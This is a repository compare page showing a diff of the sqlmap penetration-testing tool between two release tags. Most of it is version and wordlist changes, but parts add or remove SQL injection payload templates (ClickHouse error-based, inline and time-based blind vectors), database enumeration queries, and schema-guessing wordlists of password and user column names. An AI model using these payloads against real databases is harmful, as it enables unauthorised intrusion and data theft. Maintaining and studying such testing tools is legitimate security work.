PenTest/sqlmap
1
0
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-12-08 05:31:32 +00:00
Code Issues Projects Releases Wiki Activity

Compare commits

base: PenTest:1.7.3
Branches Tags
PenTest:master PenTest:gh-pages
PenTest:1.9.12 PenTest:1.9.11 PenTest:1.9.10 PenTest:1.9.9 PenTest:1.9.8 PenTest:1.9.7 PenTest:1.9.6 PenTest:1.9.5 PenTest:1.9.4 PenTest:1.9.3 PenTest:1.9.2 PenTest:1.9 PenTest:1.8.12 PenTest:1.8.11 PenTest:1.8.10 PenTest:1.8.9 PenTest:1.8.8 PenTest:1.8.7 PenTest:1.8.6 PenTest:1.8.5 PenTest:1.8.4 PenTest:1.8.3 PenTest:1.8.2 PenTest:1.8 PenTest:1.8.1 PenTest:1.7.1 PenTest:1.7.12 PenTest:1.7.11 PenTest:1.7.10 PenTest:1.7.9 PenTest:1.7.8 PenTest:1.7.7 PenTest:1.7.6 PenTest:1.7.5 PenTest:1.7.4 PenTest:1.7.3 PenTest:1.7.2 PenTest:1.7 PenTest:1.6.12 PenTest:1.6.11 PenTest:1.6.10 PenTest:1.6.9 PenTest:1.6.8 PenTest:1.6.7 PenTest:1.6.6 PenTest:1.6.5 PenTest:1.6.4 PenTest:1.6.3 PenTest:1.6.2 PenTest:1.6 PenTest:1.5.12 PenTest:1.5.11 PenTest:1.5.10 PenTest:1.5.9 PenTest:1.5.8 PenTest:1.5.7 PenTest:1.5.6 PenTest:1.5.5 PenTest:1.5.4 PenTest:1.5.3 PenTest:1.5.2 PenTest:1.5 PenTest:1.4.12 PenTest:1.4.11 PenTest:1.4.10 PenTest:1.4.9 PenTest:1.4.8 PenTest:1.4.7 PenTest:1.4.6 PenTest:1.4.5 PenTest:1.4.4 PenTest:0.19 PenTest:1.4.3 PenTest:1.4.2 PenTest:1.4 PenTest:1.3.12 PenTest:1.3.11 PenTest:1.3.10 PenTest:1.3.9 PenTest:1.3.8 PenTest:1.3.7 PenTest:1.3.6 PenTest:1.3.5 PenTest:1.3.4 PenTest:1.3.3 PenTest:1.3.2 PenTest:1.3 PenTest:1.2.12 PenTest:1.2.11 PenTest:1.2.10 PenTest:1.2.9 PenTest:1.2.8 PenTest:1.2.7 PenTest:1.2.6 PenTest:1.2.5 PenTest:1.2.4 PenTest:1.2.3 PenTest:1.2.2 PenTest:1.2 PenTest:1.1.12 PenTest:1.1.11 PenTest:1.1.10 PenTest:1.1.9 PenTest:1.1.8 PenTest:1.1.7 PenTest:1.1.6 PenTest:1.1.5 PenTest:1.1.4 PenTest:1.1.3 PenTest:1.1.2 PenTest:1.1 PenTest:1.0.12 PenTest:1.0.11 PenTest:1.0.10 PenTest:1.0.9 PenTest:1.0.8 PenTest:1.0.7 PenTest:1.0.6 PenTest:1.0.5 PenTest:1.0.4 PenTest:1.0.3 PenTest:1.0 PenTest:0.6.2 PenTest:0.6.3 PenTest:0.6.4 PenTest:0.7-rc1 PenTest:0.8-rc2 PenTest:0.8-rc3 PenTest:0.7 PenTest:0.8-rc4 PenTest:0.8 PenTest:0.9
..
compare: PenTest:1.6.6
Branches Tags
PenTest:master PenTest:gh-pages
PenTest:1.9.12 PenTest:1.9.11 PenTest:1.9.10 PenTest:1.9.9 PenTest:1.9.8 PenTest:1.9.7 PenTest:1.9.6 PenTest:1.9.5 PenTest:1.9.4 PenTest:1.9.3 PenTest:1.9.2 PenTest:1.9 PenTest:1.8.12 PenTest:1.8.11 PenTest:1.8.10 PenTest:1.8.9 PenTest:1.8.8 PenTest:1.8.7 PenTest:1.8.6 PenTest:1.8.5 PenTest:1.8.4 PenTest:1.8.3 PenTest:1.8.2 PenTest:1.8 PenTest:1.8.1 PenTest:1.7.1 PenTest:1.7.12 PenTest:1.7.11 PenTest:1.7.10 PenTest:1.7.9 PenTest:1.7.8 PenTest:1.7.7 PenTest:1.7.6 PenTest:1.7.5 PenTest:1.7.4 PenTest:1.7.3 PenTest:1.7.2 PenTest:1.7 PenTest:1.6.12 PenTest:1.6.11 PenTest:1.6.10 PenTest:1.6.9 PenTest:1.6.8 PenTest:1.6.7 PenTest:1.6.6 PenTest:1.6.5 PenTest:1.6.4 PenTest:1.6.3 PenTest:1.6.2 PenTest:1.6 PenTest:1.5.12 PenTest:1.5.11 PenTest:1.5.10 PenTest:1.5.9 PenTest:1.5.8 PenTest:1.5.7 PenTest:1.5.6 PenTest:1.5.5 PenTest:1.5.4 PenTest:1.5.3 PenTest:1.5.2 PenTest:1.5 PenTest:1.4.12 PenTest:1.4.11 PenTest:1.4.10 PenTest:1.4.9 PenTest:1.4.8 PenTest:1.4.7 PenTest:1.4.6 PenTest:1.4.5 PenTest:1.4.4 PenTest:0.19 PenTest:1.4.3 PenTest:1.4.2 PenTest:1.4 PenTest:1.3.12 PenTest:1.3.11 PenTest:1.3.10 PenTest:1.3.9 PenTest:1.3.8 PenTest:1.3.7 PenTest:1.3.6 PenTest:1.3.5 PenTest:1.3.4 PenTest:1.3.3 PenTest:1.3.2 PenTest:1.3 PenTest:1.2.12 PenTest:1.2.11 PenTest:1.2.10 PenTest:1.2.9 PenTest:1.2.8 PenTest:1.2.7 PenTest:1.2.6 PenTest:1.2.5 PenTest:1.2.4 PenTest:1.2.3 PenTest:1.2.2 PenTest:1.2 PenTest:1.1.12 PenTest:1.1.11 PenTest:1.1.10 PenTest:1.1.9 PenTest:1.1.8 PenTest:1.1.7 PenTest:1.1.6 PenTest:1.1.5 PenTest:1.1.4 PenTest:1.1.3 PenTest:1.1.2 PenTest:1.1 PenTest:1.0.12 PenTest:1.0.11 PenTest:1.0.10 PenTest:1.0.9 PenTest:1.0.8 PenTest:1.0.7 PenTest:1.0.6 PenTest:1.0.5 PenTest:1.0.4 PenTest:1.0.3 PenTest:1.0 PenTest:0.6.2 PenTest:0.6.3 PenTest:0.6.4 PenTest:0.7-rc1 PenTest:0.8-rc2 PenTest:0.8-rc3 PenTest:0.7 PenTest:0.8-rc4 PenTest:0.8 PenTest:0.9

1 Commits
1.7.3 ... 1.6.6

Author SHA1 Message Date
Miroslav Stampar
6a57c8e61a Fixes #5113 2022-06-04 00:10:24 +02:00
472 changed files with 1068 additions and 1959 deletions
Expand all files Collapse all files

2
.github/FUNDING.yml vendored
View File

@@ -1 +1 @@
github: sqlmapproject
custom: 'https://www.paypal.com/donate?hosted_button_id=A34GMDLKA2V7G'

8
.github/ISSUE_TEMPLATE/bug_report.md vendored
View File

@@ -21,10 +21,10 @@ A clear and concise description of what you expected to happen.
If applicable, add screenshots to help explain your problem.
**Running environment:**
- sqlmap version [e.g. 1.7.2.12#dev]
- Installation method [e.g. pip]
- Operating system: [e.g. Microsoft Windows 11]
- Python version [e.g. 3.11.2]
- sqlmap version [e.g. 1.3.5.93#dev]
- Installation method [e.g. git]
- Operating system: [e.g. Microsoft Windows 10]
- Python version [e.g. 3.5.2]
**Target details:**
- DBMS [e.g. Microsoft SQL Server]

2
.github/workflows/tests.yml vendored
View File

@@ -10,7 +10,7 @@ jobs:
strategy:
matrix:
os: [ubuntu-latest, macos-latest, windows-latest]
python-version: [ '2.x', '3.11', 'pypy-2.7', 'pypy-3.7' ]
python-version: [ '2.x', '3.10', 'pypy-2.7', 'pypy-3.7' ]
steps:
- uses: actions/checkout@v2
- name: Set up Python

2
LICENSE
View File

@@ -1,7 +1,7 @@
COPYING -- Describes the terms under which sqlmap is distributed. A copy
of the GNU General Public License (GPL) is appended to this file.
sqlmap is (C) 2006-2023 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.
sqlmap is (C) 2006-2022 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.
This program is free software; you may redistribute and/or modify it under
the terms of the GNU General Public License as published by the Free

1
README.md
View File

@@ -57,7 +57,6 @@ Translations
* [Croatian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md)
* [Dutch](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-nl-NL.md)
* [French](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fr-FR.md)
* [Georgian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ka-GE.md)
* [German](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-de-GER.md)
* [Greek](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md)
* [Indonesian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md)

BIN
data/shell/backdoors/backdoor.asp_
View File

Binary file not shown.

BIN
data/shell/backdoors/backdoor.aspx_
View File

Binary file not shown.

BIN
data/shell/backdoors/backdoor.jsp_
View File

Binary file not shown.

BIN
data/shell/backdoors/backdoor.php_
View File

Binary file not shown.

BIN
data/shell/stagers/stager.asp_
View File

Binary file not shown.

BIN
data/shell/stagers/stager.aspx_
View File

Binary file not shown.

BIN
data/shell/stagers/stager.jsp_
View File

Binary file not shown.

BIN
data/shell/stagers/stager.php_
View File

Binary file not shown.

34
data/txt/common-columns.txt
View File

@@ -1,4 +1,4 @@
# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission
id
@@ -1844,10 +1844,6 @@ banner_id
error
language_id
val
parol
familiya
imya
otchestvo
# site:jp
@@ -2735,34 +2731,6 @@ ssn
account
confidential
# site:nl
naam
straat
gemeente
beschrijving
id_gebruiker
gebruiker_id
gebruikersnaam
wachtwoord
telefoon
voornaam
achternaam
geslacht
huisnummer
gemeente
leeftijd
# site:cn
yonghuming
mima
xingming
xingbie
touxiang
youxiang
shouji
# Misc
u_pass

2
data/txt/common-files.txt
View File

@@ -1,4 +1,4 @@
# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission
# CTFs

3
data/txt/common-outputs.txt
View File

@@ -1,4 +1,4 @@
# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission
[Banners]
@@ -399,7 +399,6 @@ XDBWEBSERVICES
# MySQL
information_schema
performance_schema
mysql
phpmyadmin

10
data/txt/common-tables.txt
View File

@@ -1,4 +1,4 @@
# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission
users
@@ -3578,11 +3578,3 @@ users
user_usergroup_map
viewlevels
weblinks
# site:nl
gebruikers
# site:cn
yonghu

2
data/txt/keywords.txt
View File

@@ -1,4 +1,4 @@
# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission
# SQL-92 keywords (reference: http://developer.mimer.com/validator/sql-reserved-words.tml)

2
data/txt/user-agents.txt
View File

@@ -1,4 +1,4 @@
# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission
# Opera

BIN
data/udf/mysql/linux/32/lib_mysqludf_sys.so_
View File

Binary file not shown.

BIN
data/udf/mysql/linux/64/lib_mysqludf_sys.so_
View File

Binary file not shown.

BIN
data/udf/mysql/windows/32/lib_mysqludf_sys.dll_
View File

Binary file not shown.

BIN
data/udf/mysql/windows/64/lib_mysqludf_sys.dll_
View File

Binary file not shown.

BIN
data/udf/postgresql/linux/32/10/lib_postgresqludf_sys.so_
View File

Binary file not shown.

BIN
data/udf/postgresql/linux/32/11/lib_postgresqludf_sys.so_
View File

Binary file not shown.

BIN
data/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_
View File

Binary file not shown.

BIN
data/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_
View File

Binary file not shown.

BIN
data/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_
View File

Binary file not shown.

BIN
data/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_
View File

Binary file not shown.

BIN
data/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_
View File

Binary file not shown.

BIN
data/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_
View File

Binary file not shown.

BIN
data/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_
View File

Binary file not shown.

BIN
data/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_
View File

Binary file not shown.

BIN
data/udf/postgresql/linux/32/9.5/lib_postgresqludf_sys.so_
View File

Binary file not shown.

BIN
data/udf/postgresql/linux/32/9.6/lib_postgresqludf_sys.so_
View File

Binary file not shown.

BIN
data/udf/postgresql/linux/64/10/lib_postgresqludf_sys.so_
View File

Binary file not shown.

BIN
data/udf/postgresql/linux/64/11/lib_postgresqludf_sys.so_
View File

Binary file not shown.

BIN
data/udf/postgresql/linux/64/12/lib_postgresqludf_sys.so_
View File

Binary file not shown.

BIN
data/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_
View File

Binary file not shown.

BIN
data/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_
View File

Binary file not shown.

BIN
data/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_
View File

Binary file not shown.

BIN
data/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_
View File

Binary file not shown.

BIN
data/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_
View File

Binary file not shown.

BIN
data/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_
View File

Binary file not shown.

BIN
data/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_
View File

Binary file not shown.

BIN
data/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_
View File

Binary file not shown.

BIN
data/udf/postgresql/linux/64/9.5/lib_postgresqludf_sys.so_
View File

Binary file not shown.

BIN
data/udf/postgresql/linux/64/9.6/lib_postgresqludf_sys.so_
View File

Binary file not shown.

BIN
data/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_
View File

Binary file not shown.

BIN
data/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_
View File

Binary file not shown.

BIN
data/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_
View File

Binary file not shown.

BIN
data/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_
View File

Binary file not shown.

2
data/xml/banner/generic.xml
View File

@@ -34,7 +34,7 @@
<!-- Reference: https://msdn.microsoft.com/en-us/library/windows/desktop/ms724832%28v=vs.85%29.aspx -->
<regexp value="Windows.*\b10\.0">
<info type="Windows" distrib="2016|2019|2022|10|11"/>
<info type="Windows" distrib="2016|2019|10|11"/>
</regexp>
<regexp value="Windows.*\b6\.3">

8
data/xml/banner/server.xml
View File

@@ -10,7 +10,7 @@
<!-- Microsoft IIS -->
<regexp value="Microsoft-IIS/(10\.0)">
<info technology="Microsoft IIS" tech_version="1" type="Windows" distrib="2016|2019|2022|10|11"/>
<info technology="Microsoft IIS" tech_version="1" type="Windows" distrib="2019|2016|10"/>
</regexp>
<regexp value="Microsoft-IIS/(8\.5)">
@@ -878,11 +878,7 @@
</regexp>
<regexp value="Apache/2\.4\.46 \(Ubuntu\)">
<info type="Linux" distrib="Ubuntu" release="21.04|21.10" codename="hirsute|impish"/>
</regexp>
<regexp value="Apache/2\.4\.52 \(Ubuntu\)">
<info type="Linux" distrib="Ubuntu" release="22.04" codename="jammy"/>
<info type="Linux" distrib="Ubuntu" release="21.04|21.10" codename="eoan|focal"/>
</regexp>
<!-- Nginx -->

6
data/xml/errors.xml
View File

@@ -199,7 +199,6 @@
<error regexp="io\.prestosql\.jdbc"/>
<error regexp="com\.simba\.presto\.jdbc"/>
<error regexp="UNION query has different number of fields: \d+, \d+"/>
<error regexp="line \d+:\d+: mismatched input '[^']+'. Expecting:"/>
</dbms>
<dbms value="Altibase">
@@ -211,11 +210,6 @@
<error regexp="Syntax error,[^\n]+assumed to mean"/>
</dbms>
<dbms value="ClickHouse">
<error regexp="Code: \d+. DB::Exception:"/>
<error regexp="Syntax error: failed at position \d+"/>
</dbms>
<dbms value="CrateDB">
<error regexp="io\.crate\.client\.jdbc"/>
</dbms>

40
data/xml/payloads/error_based.xml
View File

@@ -838,7 +838,7 @@
<title>IBM DB2 OR error-based - WHERE or HAVING clause</title>
<stype>2</stype>
<level>4</level>
<risk>3</risk>
<risk>1</risk>
<clause>1</clause>
<where>1</where>
<vector>OR [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
@@ -853,44 +853,6 @@
</details>
</test>
<test>
<title>ClickHouse AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause</title>
<stype>2</stype>
<level>3</level>
<risk>1</risk>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]')</vector>
<request>
<payload>AND [RANDNUM]=('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]')</payload>
</request>
<response>
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
</response>
<details>
<dbms>ClickHouse</dbms>
</details>
</test>
<test>
<title>ClickHouse OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause</title>
<stype>2</stype>
<level>4</level>
<risk>3</risk>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]')</vector>
<request>
<payload>OR [RANDNUM]=('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]')</payload>
</request>
<response>
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
</response>
<details>
<dbms>ClickHouse</dbms>
</details>
</test>
<!--
TODO: if possible, add payload for SQLite, Microsoft Access,
and SAP MaxDB - no known techniques at this time

20
data/xml/payloads/inline_query.xml
View File

@@ -133,25 +133,5 @@
<dbms>Firebird</dbms>
</details>
</test>
<test>
<title>ClickHouse inline queries</title>
<stype>3</stype>
<level>3</level>
<risk>1</risk>
<clause>1,2,3,8</clause>
<where>3</where>
<vector>('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]')</vector>
<request>
<payload>('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]')</payload>
</request>
<response>
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
</response>
<details>
<dbms>ClickHouse</dbms>
</details>
</test>
<!-- End of inline queries tests -->
</root>

58
data/xml/payloads/time_blind.xml
View File

@@ -195,9 +195,9 @@
<risk>2</risk>
<clause>1,2,3,8,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])</vector>
<vector>AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])</vector>
<request>
<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)</payload>
<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)</payload>
</request>
<response>
<time>[DELAYED]</time>
@@ -235,9 +235,9 @@
<risk>3</risk>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])</vector>
<vector>OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])</vector>
<request>
<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)</payload>
<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)</payload>
</request>
<response>
<time>[DELAYED]</time>
@@ -276,9 +276,9 @@
<risk>2</risk>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])</vector>
<vector>AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])</vector>
<request>
<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)</payload>
<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)</payload>
<comment>#</comment>
</request>
<response>
@@ -318,9 +318,9 @@
<risk>3</risk>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])</vector>
<vector>OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])</vector>
<request>
<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)</payload>
<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)</payload>
<comment>#</comment>
</request>
<response>
@@ -1494,44 +1494,6 @@
</details>
</test>
<test>
<title>ClickHouse AND time-based blind (heavy query)</title>
<stype>5</stype>
<level>4</level>
<risk>1</risk>
<clause>1,2,3</clause>
<where>1</where>
<vector>AND [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(if(([INFERENCE]), 1000000, 1)))</vector>
<request>
<payload>AND [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(1000000))</payload>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>ClickHouse</dbms>
</details>
</test>
<test>
<title>ClickHouse OR time-based blind (heavy query)</title>
<stype>5</stype>
<level>5</level>
<risk>3</risk>
<clause>1,2,3</clause>
<where>1</where>
<vector>OR [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(if(([INFERENCE]), 1000000, 1)))</vector>
<request>
<payload>OR [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(1000000))</payload>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>ClickHouse</dbms>
</details>
</test>
<!-- End of time-based boolean tests -->
<!-- Time-based boolean tests - Numerous clauses -->
@@ -1646,9 +1608,9 @@
<risk>2</risk>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])</vector>
<vector>IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])</vector>
<request>
<payload>(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)</payload>
<payload>(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)</payload>
</request>
<response>
<time>[DELAYED]</time>

85
data/xml/queries.xml
View File

@@ -357,8 +357,8 @@
<blind query="SELECT tbl_name FROM sqlite_master WHERE type='table' LIMIT %d,1" count="SELECT COUNT(tbl_name) FROM sqlite_master WHERE type='table'"/>
</tables>
<columns>
<inband query="SELECT MAX(sql) FROM sqlite_master WHERE type='table' AND tbl_name='%s'"/>
<blind query="SELECT sql FROM sqlite_master WHERE type='table' AND tbl_name='%s' LIMIT 1" condition=""/>
<inband query="SELECT MAX(sql) FROM sqlite_master WHERE tbl_name='%s'"/>
<blind query="SELECT sql FROM sqlite_master WHERE tbl_name='%s' LIMIT 1" condition=""/>
</columns>
<dump_table>
<inband query="SELECT %s FROM %s"/>
@@ -938,8 +938,8 @@
<length query="LENGTH(RTRIM(CAST(%s AS CHAR(254))))"/>
<isnull query="COALESCE(%s,' ')"/>
<delimiter query="||"/>
<limit query="OFFSET %d ROWS FETCH FIRST %d ROWS ONLY"/>
<limitregexp query="OFFSET\s+([\d]+)\s+ROWS\s+FETCH\s+FIRST\s+([\d]+)\s+ROWS\s+ONLY"/>
<limit query="{LIMIT %d OFFSET %d}"/>
<limitregexp query="{LIMIT\s+([\d]+)\s+OFFSET\s+([\d]+)}"/>
<limitgroupstart query="2"/>
<limitgroupstop query="1"/>
<limitstring/>
@@ -962,11 +962,11 @@
<is_dba query="(SELECT COUNT(*) FROM SYS.SYSUSERS)>=0"/>
<dbs>
<inband query="SELECT SCHEMANAME FROM SYS.SYSSCHEMAS"/>
<blind query="SELECT SCHEMANAME FROM SYS.SYSSCHEMAS OFFSET %d ROWS FETCH FIRST 1 ROW ONLY" count="SELECT COUNT(SCHEMANAME) FROM SYS.SYSSCHEMAS"/>
<blind query="SELECT SCHEMANAME FROM SYS.SYSSCHEMAS {LIMIT 1 OFFSET %d}" count="SELECT COUNT(SCHEMANAME) FROM SYS.SYSSCHEMAS"/>
</dbs>
<tables>
<inband query="SELECT SCHEMANAME,TABLENAME FROM SYS.SYSTABLES JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID" condition="SCHEMANAME"/>
<blind query="SELECT TABLENAME FROM SYS.SYSTABLES JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE SCHEMANAME='%s' OFFSET %d ROWS FETCH FIRST 1 ROW ONLY" count="SELECT COUNT(TABLENAME) FROM SYS.SYSTABLES JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE SCHEMANAME='%s'"/>
<blind query="SELECT TABLENAME FROM SYS.SYSTABLES JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE SCHEMANAME='%s' {LIMIT 1 OFFSET %d}" count="SELECT COUNT(TABLENAME) FROM SYS.SYSTABLES JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE SCHEMANAME='%s'"/>
</tables>
<columns>
<!-- NOTE: COLUMNDATATYPE without CAST() causes problems during enumeration -->
@@ -975,11 +975,11 @@
</columns>
<dump_table>
<inband query="SELECT %s FROM %s"/>
<blind query="SELECT %s FROM %s OFFSET %d ROWS FETCH FIRST 1 ROW ONLY" count="SELECT COUNT(*) FROM %s"/>
<blind query="SELECT %s FROM %s {LIMIT 1 OFFSET %d}" count="SELECT COUNT(*) FROM %s"/>
</dump_table>
<users>
<inband query="SELECT USERNAME FROM SYS.SYSUSERS"/>
<blind query="SELECT USERNAME FROM SYS.SYSUSERS OFFSET %d ROWS FETCH FIRST 1 ROW ONLY" count="SELECT COUNT(USERNAME) FROM SYS.SYSUSERS"/>
<blind query="SELECT USERNAME FROM SYS.SYSUSERS {LIMIT 1 OFFSET %d}" count="SELECT COUNT(USERNAME) FROM SYS.SYSUSERS"/>
</users>
<!-- NOTE: No one can view the 'SYSUSERS'.'PASSWORD' column -->
<passwords/>
@@ -1319,75 +1319,6 @@
</search_column>
</dbms>
<dbms value="ClickHouse">
